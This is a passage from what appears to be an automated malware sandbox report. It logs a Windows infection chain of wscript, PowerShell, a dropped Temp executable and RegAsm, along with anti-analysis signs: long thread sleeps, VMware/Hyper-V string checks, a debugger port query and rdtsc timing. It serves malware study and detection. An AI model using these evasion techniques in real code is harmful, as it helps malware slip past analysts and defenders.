            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2750000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 27B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 47B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E2BBA0 rdtsc 7_2_02E2BBA0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2773Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3677Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 0.7 %
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7800Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7864Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: wscript.exe, 00000000.00000003.1452378172.0000023359D7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}h
            Source: wscript.exe, 00000000.00000002.1454166302.0000023359D05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1452614368.0000023357BC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1453923296.0000023357BC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: wscript.exe, 00000000.00000003.1452378172.0000023359D7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: wscript.exe, 00000000.00000002.1453923296.0000023357BA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1452049395.0000023357B9C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1452614368.0000023357BA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnpx
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E2BBA0 rdtsc 7_2_02E2BBA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00417713 LdrLoadDll,7_2_00417713
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E102E1 mov eax, dword ptr fs:[00000030h]7_2_02E102E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E102E1 mov eax, dword ptr fs:[00000030h]7_2_02E102E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E102E1 mov eax, dword ptr fs:[00000030h]7_2_02E102E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EB12ED mov eax, dword ptr fs:[00000030h]7_2_02EB12ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EB12ED mov eax, dword ptr fs:[00000030h]7_2_02EB12ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EB12ED mov eax, dword ptr fs:[00000030h]7_2_02EB12ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EB12ED mov eax, dword ptr fs:[00000030h]7_2_02EB12ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EB12ED mov eax, dword ptr fs:[00000030h]7_2_02EB12ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EB12ED mov eax, dword ptr fs:[00000030h]7_2_02EB12ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EB12ED mov eax, dword ptr fs:[00000030h]7_2_02EB12ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EB12ED mov eax, dword ptr fs:[00000030h]7_2_02EB12ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EB12ED mov eax, dword ptr fs:[00000030h]7_2_02EB12ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EB12ED mov eax, dword ptr fs:[00000030h]7_2_02EB12ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EB12ED mov eax, dword ptr fs:[00000030h]7_2_02EB12ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EB12ED mov eax, dword ptr fs:[00000030h]7_2_02EB12ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EB12ED mov eax, dword ptr fs:[00000030h]7_2_02EB12ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EB12ED mov eax, dword ptr fs:[00000030h]7_2_02EB12ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFB2D3 mov eax, dword ptr fs:[00000030h]7_2_02DFB2D3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFB2D3 mov eax, dword ptr fs:[00000030h]7_2_02DFB2D3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFB2D3 mov eax, dword ptr fs:[00000030h]7_2_02DFB2D3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02ED52E2 mov eax, dword ptr fs:[00000030h]7_2_02ED52E2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EBF2F8 mov eax, dword ptr fs:[00000030h]7_2_02EBF2F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DF92FF mov eax, dword ptr fs:[00000030h]7_2_02DF92FF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E2B2C0 mov eax, dword ptr fs:[00000030h]7_2_02E2B2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E2B2C0 mov eax, dword ptr fs:[00000030h]7_2_02E2B2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E2B2C0 mov eax, dword ptr fs:[00000030h]7_2_02E2B2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E2B2C0 mov eax, dword ptr fs:[00000030h]7_2_02E2B2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E2B2C0 mov eax, dword ptr fs:[00000030h]7_2_02E2B2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E2B2C0 mov eax, dword ptr fs:[00000030h]7_2_02E2B2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E2B2C0 mov eax, dword ptr fs:[00000030h]7_2_02E2B2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E0A2C3 mov eax, dword ptr fs:[00000030h]7_2_02E0A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E0A2C3 mov eax, dword ptr fs:[00000030h]7_2_02E0A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E0A2C3 mov eax, dword ptr fs:[00000030h]7_2_02E0A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E0A2C3 mov eax, dword ptr fs:[00000030h]7_2_02E0A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E0A2C3 mov eax, dword ptr fs:[00000030h]7_2_02E0A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E092C5 mov eax, dword ptr fs:[00000030h]7_2_02E092C5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E092C5 mov eax, dword ptr fs:[00000030h]7_2_02E092C5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E2F2D0 mov eax, dword ptr fs:[00000030h]7_2_02E2F2D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E2F2D0 mov eax, dword ptr fs:[00000030h]7_2_02E2F2D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E102A0 mov eax, dword ptr fs:[00000030h]7_2_02E102A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E102A0 mov eax, dword ptr fs:[00000030h]7_2_02E102A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E152A0 mov eax, dword ptr fs:[00000030h]7_2_02E152A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E152A0 mov eax, dword ptr fs:[00000030h]7_2_02E152A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E152A0 mov eax, dword ptr fs:[00000030h]7_2_02E152A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E152A0 mov eax, dword ptr fs:[00000030h]7_2_02E152A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E972A0 mov eax, dword ptr fs:[00000030h]7_2_02E972A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E972A0 mov eax, dword ptr fs:[00000030h]7_2_02E972A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E962A0 mov eax, dword ptr fs:[00000030h]7_2_02E962A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E962A0 mov ecx, dword ptr fs:[00000030h]7_2_02E962A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E962A0 mov eax, dword ptr fs:[00000030h]7_2_02E962A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E962A0 mov eax, dword ptr fs:[00000030h]7_2_02E962A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E962A0 mov eax, dword ptr fs:[00000030h]7_2_02E962A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E962A0 mov eax, dword ptr fs:[00000030h]7_2_02E962A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EC92A6 mov eax, dword ptr fs:[00000030h]7_2_02EC92A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EC92A6 mov eax, dword ptr fs:[00000030h]7_2_02EC92A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EC92A6 mov eax, dword ptr fs:[00000030h]7_2_02EC92A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EC92A6 mov eax, dword ptr fs:[00000030h]7_2_02EC92A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E892BC mov eax, dword ptr fs:[00000030h]7_2_02E892BC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E892BC mov eax, dword ptr fs:[00000030h]7_2_02E892BC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E892BC mov ecx, dword ptr fs:[00000030h]7_2_02E892BC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E892BC mov ecx, dword ptr fs:[00000030h]7_2_02E892BC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E3E284 mov eax, dword ptr fs:[00000030h]7_2_02E3E284
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E3E284 mov eax, dword ptr fs:[00000030h]7_2_02E3E284
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E80283 mov eax, dword ptr fs:[00000030h]7_2_02E80283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E80283 mov eax, dword ptr fs:[00000030h]7_2_02E80283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E80283 mov eax, dword ptr fs:[00000030h]7_2_02E80283
